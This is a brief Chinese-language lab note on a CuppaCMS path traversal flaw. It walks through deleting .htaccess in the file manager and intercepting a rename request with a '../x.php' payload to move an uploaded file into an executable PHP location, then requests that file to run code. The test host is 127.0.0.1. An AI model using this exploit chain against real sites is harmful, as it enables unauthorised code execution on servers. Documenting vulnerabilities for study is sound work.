【笔记】CuppaCMS路径穿越漏洞

前言

CuppaCMS路径穿越漏洞

正文

  • File Manager->Upload->选择一个图片文件x.png->Copy->得到文件的上传路径URL Path->Copied

  • File Manager中,点击.htaccess文件的垃圾桶按钮删除文件

  • File Manager中,点击刚刚上传的图片文件的铅笔按钮重命名文件,随意填写新的文件名->抓包修改数据包

request
1
2
3
4
POST http://127.0.0.1:80/js/filemanager/api/index.php
Content-Type: application/json

{"from":"/files/x.png","to":"../x.php","action":"rename"}
  • 访问/media/x.php文件即可执行恶意代码
request
1
GET http://127.0.0.1:80/media/x.php

完成

参考文献

哔哩哔哩——xiaodisec